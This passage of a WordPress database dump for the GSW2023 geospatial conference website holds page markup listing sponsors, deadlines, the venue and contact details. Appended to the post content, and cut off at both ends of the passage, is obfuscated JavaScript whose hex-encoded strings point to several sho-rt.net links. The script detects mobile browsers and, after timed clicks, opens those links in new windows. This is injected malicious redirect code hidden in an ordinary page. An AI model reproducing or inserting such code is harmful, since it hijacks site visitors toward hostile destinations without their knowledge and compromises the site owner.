_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:51:05','2023-05-16 01:51:05','',3066,'https://gsw2023.com/?p=4496',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4497,1,'2023-05-16 01:59:58','2023-05-16 01:59:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202361791{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 